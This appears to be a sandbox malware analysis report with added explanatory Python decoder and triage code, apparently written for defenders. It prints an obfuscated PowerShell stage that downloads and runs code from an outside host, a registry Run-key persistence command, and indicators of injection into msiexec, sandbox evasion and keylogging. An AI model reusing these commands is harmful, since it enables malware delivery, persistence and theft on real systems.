$Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C4F92AEB push ss; ret 2_2_00007FF7C4F92AEC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C4F9750B push ebx; iretd 2_2_00007FF7C4F9754A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C5067E0B push eax; retf 2_2_00007FF7C5067E0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0451D6E5 pushad ; retf 4_2_0451D6F9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_045136AB push ebx; iretd 4_2_045136EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_04519073 push eax; retf 4_2_04519099
            Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Motorskib
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Windows\System32\wscript.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_MemoryDevice
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Program Files\qga\qga.exe
            Source: powershell.exe, 00000004.00000002.128202232697.0000000006A80000.00000004.00001000.00020000.00000000.sdmp  Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: powershell.exe, 00000004.00000002.128209937242.000000000853A000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES
            Source: C:\Windows\System32\wscript.exe  Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 9928
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 9917
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7068  Thread sleep count: 2000 > 30
            Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed  (2 events)
            Source: C:\Windows\SysWOW64\msiexec.exe  Last function: Thread delayed  (2 events)
            Source: C:\Windows\SysWOW64\msiexec.exe  Thread sleep count: Count: 2000 delay: -5
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Hyper-V Guest Shutdown Service
            Source: msiexec.exe, 00000006.00000003.128560180223.000000000885F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.128753973581.000000000885F000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW8
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: powershell.exe, 00000004.00000002.128209937242.000000000853A000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: vmicshutdown
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Hyper-V PowerShell Direct Service
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Hyper-V Time Synchronization Service
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: vmicvss
            Source: msiexec.exe, 00000006.00000002.128753973581.000000000886C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560406793.000000000889E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.128753973581.000000000889E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560180223.000000000886C000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000004.00000002.128202232697.0000000006A80000.00000004.00001000.00020000.00000000.sdmp  Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Hyper-V Data Exchange Service
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Hyper-V Heartbeat Service
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Hyper-V Guest Service Interface
            Source: powershell.exe, 00000002.00000002.127616099079.0000027E9C21E000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 00000004.00000002.128382144909.000000000D529000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: vmicheartbeat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  System information queried: ModuleInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\msiexec.exe  Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_0436D41C LdrInitializeThunk,LdrInitializeThunk,4_2_0436D41C

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
            Source: Yara match  File source: amsi64_6212.amsi.csv, type: OTHER
            Source: Yara match  File source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTR
            Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3592, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3AE0000
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"
            Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"
            Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (the same "echo $Hles;function Strejflyset..." command line as above, lower-cased by the report; listed twice)
            Source: unknown  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"  (the same "echo $hles;function strejflyset..." command line as above, lower-cased by the report)
            Source: C:\Windows\SysWOW64\msiexec.exe  Process created: C:\Windows\SysWOW64\cmd.exe  (the same REG ADD ... /v "motorskib" command line as above, lower-cased by the report; listed twice)
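            The PowerShell stage that wscript.exe launches above hides every literal behind the Krigskunst function: it walks the argument from index 5 in steps of 6 and keeps only those characters, so the visible Danish-looking words are filler and the clear text is every sixth character. Strejflyset then dot-sources each decoded chunk through the decoded value of $Postlachrymal, which is iEX (the Invoke-Expression alias), so every decoded chunk is a PowerShell statement. The decoder below is an added example, not part of the report or of the sample; it re-implements that stride in Python and applies it to literals copied from the command line above. One caveat for anyone working from the rendered report: HTML collapses runs of spaces, so a literal that originally held two adjacent spaces is one character short on this page and the stride slips from that point on. The first piece of $Lovgennemgangene shows it, and the double-spaced version of that piece used below is an assumption, not text from the report.

```python
"""Decoder for the string obfuscation in the PowerShell stage above.
Added example; not part of the Joe Sandbox report or the sample.  It re-implements
the sample's Krigskunst function: the clear text is every 6th character starting
at index 5, everything else is filler."""


def krigskunst(blob: str, start: int = 5, step: int = 6) -> str:
    """Python equivalent of the sample's loop:
       $Occipitally=5; do { $out += $s[$Occipitally]; $Occipitally += 6 } until(!$s[$Occipitally])
    Indexing past the end of a PowerShell string yields $null, so the loop stops at the
    first out-of-range index; a Python slice stops in the same place.  The Format-List
    call inside the sample's loop receives no input and does not affect the result."""
    return blob[start::step]


def decode_assignment(chunks) -> str:
    """Join the pieces of a variable the script builds with '=' followed by '+='."""
    return "".join(krigskunst(c) for c in chunks)


# Obfuscated literals copied from the command line in the report.
SAMPLES = {
    "Lovgennemgangene_2": "Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant",
    "outyelps_1": " R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/",
    "Affirmationerne": "LrerfTDedoll Intess tte1Valut2",
    "dermutation": " DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget",
    "Postlachrymal": "B.deriF erdE HydrX",
    "Textus": "Am hi>",
}

# Caveat: the report is rendered HTML, which collapses runs of spaces.  Where a
# literal originally held two adjacent spaces, the page copy is one character
# short and the stride slips from there on.  The first piece of $Lovgennemgangene
# shows it; the double-spaced version is an assumption, not text from the report.
PAGE_COPY = "UdskrnHorrieGlyphTBagdi. atoW"
ASSUMED_ORIGINAL = "UdskrnHorrieGlyphTBagdi.  atoW"


def decode_all(samples=SAMPLES) -> dict:
    """Decode every literal.  PowerShell is case-insensitive, so the odd casing of the
    output (iEX, USEr-aGEnt) is cosmetic; lower-casing gives the readable form."""
    return {name: krigskunst(blob) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, clear in decode_all().items():
        print(f"{name:20s} {clear!r}")
    print("page copy        ", repr(krigskunst(PAGE_COPY)))
    print("assumed original ", repr(krigskunst(ASSUMED_ORIGINAL)))
    print("Net.WebClient    ", repr(decode_assignment([ASSUMED_ORIGINAL, SAMPLES["Lovgennemgangene_2"]])))
```

            The same slice works on every Krigskunst argument in the command line; only literals that lost whitespace in rendering need the original script (or the process-memory dump) to decode cleanly.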
            Source: msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Program Manager
            Source: msiexec.exe, 00000006.00000002.128753909051.000000000884C000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: [2025/02/27 01:44:39 Program Manager]
            Source: msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation  (7 events)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation  (7 events)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
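            The process-creation lines in this section describe the whole chain: wscript.exe starts powershell.exe with the obfuscated script, the 32-bit powershell.exe starts msiexec.exe with no arguments and then queues an APC into it and writes to its memory, and the injected msiexec.exe calls cmd.exe and reg.exe to add a Run value named Motorskib. That Run value is of type REG_EXPAND_SZ, its launcher is the environment variable %Markoerpositioner% (the report does not show what it expands to), it asks for -windowstyle 1 (ProcessWindowStyle.Hidden), and the script it runs is read at logon from the registry value dvaergene under HKCU:\Software\Fjeldrreder\, so the Run entry itself contains neither a binary path nor the payload. The Python below is an added example, not from the report; it runs three checks over a constructed set of process-creation events built from the command lines above (the PIDs, the wscript.exe arguments and the parent of the 32-bit powershell.exe are assumptions).

```python
"""Triage of the execution chain recorded in this report:
script host -> powershell.exe -> argument-less msiexec.exe -> cmd.exe -> reg.exe
adding an HKCU Run value.  Added example, not part of the Joe Sandbox report.
The events are constructed from the command lines in the report; PIDs, the
wscript.exe arguments and the parent of the 32-bit powershell.exe are made up."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Run-value data exactly as it appears in the report's reg.exe command line.
RUN_DATA = (r"%Markoerpositioner% -windowstyle 1 "
            r"$Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');"
            r"%Markoerpositioner% ($Skan)")
REG_ADD = (r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" '
           r'/f /v "Motorskib" /t REG_EXPAND_SZ /d "' + RUN_DATA + '"')

EVENTS = [  # constructed to mirror the report's process tree
    ProcEvent(100, 1, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" sample.vbs'),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'"echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} ..."'),
    ProcEvent(300, 200, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",  # parent assumed
              r'"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $hles;..."'),
    ProcEvent(400, 300, r"C:\Windows\SysWOW64\msiexec.exe", r'"C:\Windows\SysWOW64\msiexec.exe"'),
    ProcEvent(500, 400, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    ProcEvent(600, 500, r"C:\Windows\SysWOW64\reg.exe", REG_ADD),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
INTERPRETERS = SCRIPT_HOSTS | {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe"}
ARGLESS_MSIEXEC = re.compile(r'^\s*"?[^"]*\\msiexec\.exe"?\s*$', re.I)
RUN_KEY = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?P<key>[^"\s]+\\CurrentVersion\\Run(?:Once)?)"?\s+(?P<rest>.*)',
    re.I | re.S)
REG_PATH = re.compile(r'HK[A-Z]{2,4}:\\[^\'")]+', re.I)  # HKCU:\... paths read at run time


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_script_host_to_powershell(events):
    """wscript/cscript/mshta spawning PowerShell (the report's 'Wscript starts Powershell')."""
    by_pid = {e.pid: e for e in events}
    return [e for e in events
            if basename(e.image) in {"powershell.exe", "pwsh.exe"}
            and e.ppid in by_pid and basename(by_pid[e.ppid].image) in SCRIPT_HOSTS]


def find_argless_msiexec(events):
    """msiexec.exe started with no arguments by an interpreter: nothing is being
    installed, so the process exists only to receive injected code."""
    by_pid = {e.pid: e for e in events}
    return [e for e in events
            if basename(e.image) == "msiexec.exe" and ARGLESS_MSIEXEC.match(e.cmdline)
            and e.ppid in by_pid and basename(by_pid[e.ppid].image) in INTERPRETERS]


def parse_run_key_add(cmdline):
    """Pull key, value name, type and data out of a 'reg add ... Run' command line."""
    m = RUN_KEY.search(cmdline)
    if not m:
        return None
    rest = m.group("rest")
    name = re.search(r'/v\s+"?([^"\s]+)"?', rest, re.I)
    vtype = re.search(r'/t\s+(REG_\w+)', rest, re.I)
    data = re.search(r'/d\s+"(.*)"\s*$', rest, re.I | re.S) or re.search(r'/d\s+(\S+)', rest, re.I)
    data_str = data.group(1) if data else ""
    return {
        "key": m.group("key"),
        "value_name": name.group(1) if name else None,
        "value_type": vtype.group(1).upper() if vtype else None,
        "data": data_str,
        # With REG_EXPAND_SZ the %VAR% is expanded at logon: the real launcher is
        # whatever the variable holds, not anything visible in the Run value.
        "env_vars": sorted(set(re.findall(r"%([^%\s]+)%", data_str))),
        "registry_reads": REG_PATH.findall(data_str),  # second stage staged in the registry
        "launcher_is_env_var": data_str.lstrip().startswith("%"),
    }


def assess_run_key(parsed):
    """Reasons this Run value is suspicious, one string per reason."""
    reasons = []
    if parsed["value_type"] == "REG_EXPAND_SZ" and parsed["launcher_is_env_var"]:
        reasons.append("launcher is an environment variable expanded at logon: "
                       + ", ".join(parsed["env_vars"]))
    if parsed["registry_reads"]:
        reasons.append("payload read from the registry at run time: " + ", ".join(parsed["registry_reads"]))
    if re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", parsed["data"], re.I):
        reasons.append("hidden window requested (ProcessWindowStyle.Hidden = 1)")
    return reasons


def triage(events):
    """Findings for the whole event set, as printable strings."""
    findings = [f"pid {e.pid}: script host launched PowerShell" for e in find_script_host_to_powershell(events)]
    findings += [f"pid {e.pid}: argument-less msiexec.exe spawned by an interpreter (injection host)"
                 for e in find_argless_msiexec(events)]
    for e in events:
        p = parse_run_key_add(e.cmdline)
        if p:
            findings.append(f"pid {e.pid}: Run value {p['value_name']!r}: " + "; ".join(assess_run_key(p)))
    return findings


if __name__ == "__main__":
    print("\n".join(triage(EVENTS)))
```

            The Run-key parser flags the value even when the logged command line is lower-cased, as the report's duplicate entries are, because every match is case-insensitive; the value it cannot resolve is %Markoerpositioner%, which has to be read from the victim's environment or from the process memory dump.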

            Stealing of Sensitive Information

            Source: Yara match  File source: Process Memory Space: msiexec.exe PID: 1616, type: MEMORYSTR
            Source: Yara match  File source: C:\Users\user\AppData\Roaming\abios.dat, type: DROPPED

            Remote Access Functionality

            Source: Yara match  File source: Process Memory Space: msiexec.exe PID: 1616, type: MEMORYSTR
            Source: Yara match  File source: C:\Users\user\AppData\Roaming\abios.dat, type: DROPPED
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 221 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 221 Scripting | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 11 Input Capture | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 312 Process Injection | 1 Software Packing | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Masquerading | NTDS | 13 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Modify Registry | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 13 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 312 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1625389; Sample: REMIT_SCAN_0000891773837828...; Startdate: 27/02/2025; Architecture: WINDOWS; Score: 100
            (numbers in brackets are the created-registry-value / created-file counts as shown on the graph)

            Sample start
              DNS/IP: sbtechus.com; ipfs.io
              Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures
              -> powershell.exe [18] started
                   Signatures: Early bird code injection technique detected; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 3 other signatures
                   -> msiexec.exe [6 8] started
                        DNS/IP: 62.171.160.89, ports 2404, 49784, 49785, CONTABODE, United Kingdom; ipfs.io 209.94.90.1, ports 443, 49783, PROTOCOLUS, United States
                        Dropped: C:\Users\user\AppData\Roaming\abios.dat, data
                        Signatures: Tries to detect Any.run; Installs a global keyboard hook
                        -> cmd.exe [1] started
                             -> conhost.exe started
